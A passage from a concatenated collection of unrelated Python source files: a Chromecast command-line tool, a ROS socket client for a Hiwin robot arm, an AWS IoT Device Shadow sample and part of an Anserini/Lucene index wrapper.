cst = setup_cast(settings["device"], action="ffwd", prep="control")
cst.ffwd(timedesc)
@cli.command(short_help="Seek the video to TIME position.")
@click.argument("timedesc", type=CATT_TIME, metavar="TIME")
@click.pass_obj
def seek(settings, timedesc):
cst = setup_cast(settings["device"], action="seek", prep="control")
cst.seek(timedesc)
@cli.command(short_help="Skip to end of content.")
@click.pass_obj
def skip(settings):
cst = setup_cast(settings["device"], action="skip", prep="control")
cst.skip()
@cli.command(short_help="Set the volume to LVL [0-100].")
@click.argument("level", type=click.IntRange(0, 100), metavar="LVL")
@click.pass_obj
def volume(settings, level):
cst = setup_cast(settings["device"])
cst.volume(level / 100.0)
@cli.command(short_help="Turn up volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumeup(settings, delta):
cst = setup_cast(settings["device"])
cst.volumeup(delta / 100.0)
@cli.command(short_help="Turn down volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumedown(settings, delta):
cst = setup_cast(settings["device"])
cst.volumedown(delta / 100.0)
@cli.command(short_help="Show some information about the currently-playing video.")
@click.pass_obj
def status(settings):
cst = setup_cast(settings["device"], prep="info")
echo_status(cst.cast_info)
@cli.command(short_help="Show complete information about the currently-playing video.")
@click.option("-j", "--json-output", is_flag=True, help="Output info as json.")
@click.pass_obj
def info(settings, json_output):
try:
cst = setup_cast(settings["device"], prep="info")
except CastError:
if json_output:
info = {}
else:
raise
else:
info = cst.info
if json_output:
echo_json(info)
else:
for (key, value) in info.items():
click.echo("{}: {}".format(key, value))
@cli.command(short_help="Scan the local network and show all Chromecasts and their IPs.")
@click.option("-j", "--json-output", is_flag=True, help="Output scan result as json.")
def scan(json_output):
if not json_output:
click.echo("Scanning Chromecasts...")
devices_dict = {
d.name: {
"host": d.host,
"port": d.port,
"manufacturer": d.device.manufacturer,
"model_name": d.model_name,
"uuid": d.uuid,
"cast_type": d.cast_type,
}
for d in get_chromecasts()
}
if json_output:
echo_json(devices_dict)
else:
if not devices_dict:
raise CastError("No devices found")
for device in devices_dict.keys():
click.echo("{host} - {device} - {manufacturer} {model_name}".format(device=device, **devices_dict[device]))
@cli.command(short_help="Save the current state of the Chromecast for later use.")
@click.argument("path", type=click.Path(writable=True), callback=process_path, required=False)
@click.pass_obj
def save(settings, path):
cst = setup_cast(settings["device"], prep="control")
if not cst.save_capability or cst.is_streaming_local_file:
raise CliError("Saving state of this kind of content is not supported")
elif cst.save_capability == "partial":
echo_warning("Please be advised that playlist data will not be saved")
echo_status(cst.media_info)
if path and path.is_file():
click.confirm("File already exists. Overwrite?", abort=True)
click.echo("Saving...")
if path:
state = CastState(path, StateMode.ARBI)
cc_name = "*"
else:
state = CastState(STATE_PATH, StateMode.CONF)
cc_name = cst.cc_name
state.set_data(cc_name, {"controller": cst.name, "data": cst.media_info})
@cli.command(short_help="Return Chromecast to saved state.")
@click.argument("path", type=click.Path(exists=True), callback=process_path, required=False)
@click.pass_obj
def restore(settings, path):
if not path and not STATE_PATH.is_file():
raise CliError("Save file in config dir has not been created")
cst = setup_cast(settings["device"])
state = CastState(path or STATE_PATH, StateMode.READ)
try:
data = state.get_data(cst.cc_name if not path else None)
except StateFileError:
raise CliError("The chosen file is not a valid save file")
if not data:
raise CliError("No save data found for this device")
echo_status(data["data"])
click.echo("Restoring...")
cst = setup_cast(settings["device"], prep="app", controller=data["controller"])
cst.restore(data["data"])
@cli.command("write_config", short_help='Please use "set_default".')
def write_config():
raise CliError('This command is now called "set_default"')
@cli.command("set_default", short_help="Set the selected device as default.")
@click.pass_obj
def set_default(settings):
config = readconfig()
device = get_device_from_settings(settings)
config["options"]["device"] = device
writeconfig(config)
@cli.command("del_default", short_help="Delete the default device.")
@click.pass_obj
def del_default(settings):
config = readconfig()
if "device" not in config["options"]:
raise CliError("No default device is set, so none deleted")
config["options"].pop("device")
writeconfig(config)
@cli.command("set_alias", short_help="Set an alias name for the selected device.")
@click.argument("name")
@click.pass_obj
def set_alias(settings, name):
config = readconfig()
device = get_device_from_settings(settings)
old_alias = get_alias_from_config(config, device)
if old_alias:
config["aliases"].pop(old_alias)
config["aliases"][name] = device
writeconfig(config)
@cli.command("del_alias", short_help="Delete the alias name of the selected device.")
@click.pass_obj
def del_alias(settings):
config = readconfig()
device = get_device_from_settings(settings)
alias = get_alias_from_config(config, device)
if not alias:
raise CliError('No alias exists for "{}", so none deleted'.format(device))
config["aliases"].pop(alias)
writeconfig(config)
def get_alias_from_config(config, device):
try:
return next(a for a, d in config["aliases"].items() if d == device)
except StopIteration:
return None
def get_device_from_settings(settings):
device = settings.get("device")
if device:
devices = get_chromecasts()
try:
if is_ipaddress(device):
next(d for d in devices if d.host == device)
else:
next(d for d in devices if d.name == device)
except StopIteration:
raise CliError('Specified device "{}" not found'.format(device))
else:
raise CliError("No device specified")
return device
def writeconfig(config):
try:
CONFIG_DIR.mkdir(parents=True)
except FileExistsError:
pass
with CONFIG_PATH.open("w") as configfile:
config.write(configfile)
def readconfig():
config = configparser.ConfigParser()
# ConfigParser.read does not take path-like objects <3.6.
config.read(str(CONFIG_PATH))
for req_section in ("options", "aliases"):
if req_section not in config.sections():
config.add_section(req_section)
return config
def get_default_map():
"""
Returns a dictionary of the form:
{"option": "value",
"aliases": {"device1": "device_name"}}
"""
config = readconfig()
conf_dict = {section: dict(config.items(section)) for section in config.sections()}
default_map = conf_dict["options"]
default_map["aliases"] = conf_dict["aliases"]
return default_map
def main():
try:
return cli(obj={}, default_map=get_default_map())
except CattUserError as err:
sys.exit("Error: {}.".format(str(err)))
if __name__ == "__main__":
main()
|
Hiwin_RT605_ArmCommand_Socket_20190627175041.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
#print("sssss:",socket_cmd.action)
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
#print(data)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
shadow.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
"Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
"Necessary if MQTT server uses a certificate that's not already in " +
"your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
help="To use a websocket instead of raw mqtt. If you " +
"specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
"is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
help='Logging level')
# Using globals to simplify sample code
is_sample_done = threading.Event()
mqtt_connection = None
shadow_client = None
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"
class LockedData:
def __init__(self):
self.lock = threading.Lock()
self.shadow_value = None
self.disconnect_called = False
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
print("Finished getting initial shadow state.")
with locked_data.lock:
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
)
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
while True:
try:
# Read user input
new_value = input()
# If user wants to quit sample, then quit.
# Otherwise change the shadow value.
if new_value in ['exit', 'quit']:
exit("User has quit")
break
else:
change_shadow_value(new_value)
except Exception as e:
print("Exception on input thread.")
exit(e)
break
if __name__ == '__main__':
# Process input args
args = parser.parse_args()
thing_name = args.thing_name
shadow_property = args.shadow_property
io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
proxy_options = None
if (args.proxy_host):
proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
if args.use_websocket == True:
credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
endpoint=args.endpoint,
client_bootstrap=client_bootstrap,
region=args.signing_region,
credentials_provider=credentials_provider,
http_proxy_options=proxy_options,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=False,
keep_alive_secs=6)
else:
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=args.endpoint,
cert_filepath=args.cert,
pri_key_filepath=args.key,
client_bootstrap=client_bootstrap,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=False,
keep_alive_secs=6,
http_proxy_options=proxy_options)
print("Connecting to {} with client ID '{}'...".format(
args.endpoint, args.client_id))
connected_future = mqtt_connection.connect()
shadow_client = iotshadow.IotShadowClient(mqtt_connection)
# Wait for connection to be fully established.
# Note that it's not necessary to wait, commands issued to the
# mqtt_connection before its fully connected will simply be queued.
# But this sample waits here so it's obvious when a connection
# fails or succeeds.
connected_future.result()
print("Connected!")
try:
# Subscribe to necessary topics.
# Note that is **is** important to wait for "accepted/rejected" subscriptions
# to succeed before publishing the corresponding "request".
print("Subscribing to Delta events...")
delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_shadow_delta_updated)
# Wait for subscription to succeed
delta_subscribed_future.result()
print("Subscribing to Update responses...")
update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_accepted)
update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_rejected)
# Wait for subscriptions to succeed
update_accepted_subscribed_future.result()
update_rejected_subscribed_future.result()
print("Subscribing to Get responses...")
get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_accepted)
get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_rejected)
# Wait for subscriptions to succeed
get_accepted_subscribed_future.result()
get_rejected_subscribed_future.result()
# The rest of the sample runs asyncronously.
# Issue request for shadow's current state.
# The response will be received by the on_get_accepted() callback
print("Requesting current shadow state...")
publish_get_future = shadow_client.publish_get_shadow(
request=iotshadow.GetShadowRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE)
# Ensure that publish succeeds
publish_get_future.result()
# Launch thread to handle user input.
# A "daemon" thread won't prevent the program from shutting down.
print("Launching thread to read user input...")
user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
user_input_thread.daemon = True
user_input_thread.start()
except Exception as e:
exit(e)
# Wait for the sample to finish (user types 'quit', or an error occurs)
is_sample_done.wait()
|
multifield_anserini.py
|
import os
import math
import json
import tempfile
import itertools
import time
import re
import shutil
import threading
import contextlib
from multiprocessing.pool import ThreadPool
from functools import lru_cache
from pytools import memoize_method
import onir
from onir import indices
from onir.interfaces import trec
from onir.interfaces.java import J
logger = onir.log.easy()
J.register(jars=["bin/lucene-backward-codecs-8.0.0.jar", "bin/anserini-0.8.0-fatjar.jar"], defs=dict(
# [L]ucene
L_FSDirectory='org.apache.lucene.store.FSDirectory',
L_DirectoryReader='org.apache.lucene.index.DirectoryReader',
L_Term='org.apache.lucene.index.Term',
L_IndexSearcher='org.apache.lucene.search.IndexSearcher',
L_BM25Similarity='org.apache.lucene.search.similarities.BM25Similarity',
L_ClassicSimilarity='org.apache.lucene.search.similarities.ClassicSimilarity',
L_LMDirichletSimilarity='org.apache.lucene.search.similarities.LMDirichletSimilarity',
L_QueryParser='org.apache.lucene.queryparser.flexible.standard.StandardQueryParser',
L_QueryParserUtil='org.apache.lucene.queryparser.flexible.standard.QueryParserUtil',
L_StandardAnalyzer='org.apache.lucene.analysis.standard.StandardAnalyzer',
L_EnglishAnalyzer='org.apache.lucene.analysis.en.EnglishAnalyzer',
L_CharArraySet='org.apache.lucene.analysis.CharArraySet',
L_MultiFields='org.apache.lucene.index.MultiFields',
# [A]nserini
A_IndexCollection='io.anserini.index.IndexCollection',
A_IndexArgs='io.anserini.index.IndexArgs',
A_IndexUtils='io.anserini.index.IndexUtils',
A_LuceneDocumentGenerator='io.anserini.index.generator.LuceneDocumentGenerator',
A_SearchCollection='io.anserini.search.SearchCollection',
A_SearchArgs='io.anserini.search.SearchArgs',
A_DefaultEnglishAnalyzer='io.anserini.analysis.DefaultEnglishAnalyzer',
A_AnalyzerUtils='io.anserini.analysis.AnalyzerUtils',
# [M]isc
M_CmdLineParser='org.kohsuke.args4j.CmdLineParser',
))
def _surpress_log(java_class, levels=('DEBUG', 'INFO')):
re_levels = r'|'.join([re.escape(l) for l in levels])
re_java_class = re.escape(java_class)
regex = rf'({re_levels}) {re_java_class}'
def wrapped(log_line):
return re.search(regex, log_line) is None
return wrapped
def pbar_bq_listener(pbar):
def wrapped(log_line):
match = re.search(r'INFO io.anserini.search.SearchCollection \[pool-.*-thread-.*\] ([0-9]+) queries processed', log_line)
if match:
count = int(match.group(1))
pbar.update(count - pbar.n)
return False
return wrapped
class MultifieldAnseriniIndex(indices.BaseIndex):
"""
Interface to an Anserini index.
"""
def __init__(self, path, keep_stops=False, stemmer='porter', primary_field='text', lang='en'):
self._base_path = path
os.makedirs(path, exist_ok=True)
self._path = f'{path}-{primary_field}'
if not os.path.exists(self._path):
os.symlink(self._base_path.split('/')[-1], self._path, target_is_directory=True)
self._primary_field = primary_field
self._settings_path = os.path.join(path, 'settings.json')
if os.path.exists(self._settings_path):
self._load_settings()
assert self._settings['keep_stops'] == keep_stops
assert self._settings['stemmer'] == stemmer
assert self._settings['lang'] == lang
else:
self._settings = {
'keep_stops': keep_stops,
'stemmer': stemmer,
'lang': lang,
'built': False
}
self._dump_settings()
def _dump_settings(self):
with open(self._settings_path, 'wt') as f:
json.dump(self._settings, f)
def _load_settings(self):
with open(self._settings_path, 'rt') as f:
self._settings = json.load(f)
if 'lang' not in self._settings:
self._settings['lang'] = 'en'
def built(self):
self._load_settings()
return self._settings['built']
def built(self):
self._load_settings()
return self._settings['built']
def num_docs(self):
return self._reader().numDocs()
def docids(self):
index_utils = self._get_index_utils()
for i in range(self.num_docs()):
yield index_utils.convertLuceneDocidToDocid(i)
def get_raw(self, did):
return self._get_index_utils().getRawDocument(did)
def path(self):
return self._path
@memoize_method
def _reader(self):
return J.L_DirectoryReader.open(J.L_FSDirectory.open(J.File(self._path).toPath()))
@memoize_method
def _searcher(self):
return J.L_IndexSearcher(self._reader().getContext())
@memoize_method
def term2idf(self, term):
#term = J.A_AnalyzerUtils.tokenize(self._get_stemmed_analyzer(), term).toArray()
term = J.A_AnalyzerUtils.analyze(self._get_analyzer(), term).toArray()
if term:
df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
doc_count = self.collection_stats().docCount()
return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
return 0. # stop word; very common
@memoize_method
def term2idf_unstemmed(self, term):
#term = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), term).toArray()
term = J.A_AnalyzerUtils.analyze(self._get_analyzer(), term).toArray()
if len(term) == 1:
df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
doc_count = self.collection_stats().docCount()
return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
return 0. # stop word; very common
def doc_freq(self, term):
return self._reader().docFreq(J.L_Term(self._primary_field, term))
@memoize_method
def collection_stats(self):
return self._searcher().collectionStatistics(self._primary_field)
def document_vector(self, did):
result = {}
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
vec = self._reader().getTermVector(ldid, self._primary_field)
it = vec.iterator()
while it.next():
result[it.term().utf8ToString()] = it.totalTermFreq()
return result
def avg_dl(self):
cs = self.collection_stats()
return cs.sumTotalTermFreq() / cs.docCount()
@memoize_method
def _get_index_utils(self):
return J.A_IndexUtils(self._path)
@lru_cache(maxsize=16)
def get_doc(self, did):
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
if ldid == -1:
return ["a"] # hack -- missing doc
return self._get_index_utils().getTransformedDocument(did) or ["a"]
@memoize_method
def _get_analyzer(self):
return J.L_StandardAnalyzer(J.L_CharArraySet(0, False))
@memoize_method
def _get_stemmed_analyzer(self):
#return J.A_DefaultEnglishAnalyzer(self._settings['stemmer'], J.L_CharArraySet(0, False))
return J.A_DefaultEnglishAnalyzer.newStemmingInstance(self._settings['stemmer'], J.L_CharArraySet(0, False))
def tokenize(self, text):
#result = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), text).toArray()
result = J.A_AnalyzerUtils.analyze(self._get_analyzer(), text).toArray()
# mostly good, just gonna split off contractions
result = list(itertools.chain(*(x.split("'") for x in result)))
return result
def iter_terms(self):
it_leaves = self._reader().leaves().iterator()
while it_leaves.hasNext():
it_terms = it_leaves.next().reader().terms(self._primary_field).iterator()
while it_terms.next():
yield {
'term': it_terms.term().utf8ToString(),
'df': it_terms.docFreq(),
'cf': it_terms.totalTermFreq(),
}
@memoize_method
def _model(self, model):
if model == 'randomqrels':
return self._model('bm25_k1-0.6_b-0.5')
if model.startswith('bm25'):
k1, b = 0.9, 0.4
Model = J.L_BM25Similarity
for arg in model.split('_')[1:]:
if '-' in arg:
k, v = arg.split('-')
else:
k, v = arg, None
if k == 'k1':
k1 = float(v)
elif k == 'b':
b = float(v)
elif k == 'noidf':
Model = J.A_BM25SimilarityNoIdf
else:
raise ValueError(f'unknown bm25 parameter {k}={v}')
return Model(k1, b)
elif model == 'vsm':
return J.L_ClassicSimilarity()
elif model == 'ql':
mu = 1000.
for k, v in [arg.split('-') for arg in model.split('_')[1:]]:
if k == 'mu':
mu = float(v)
else:
raise ValueError(f'unknown ql parameter {k}={v}')
return J.L_LMDirichletSimilarity(mu)
raise ValueError(f'unknown model {model}')
@memoize_method
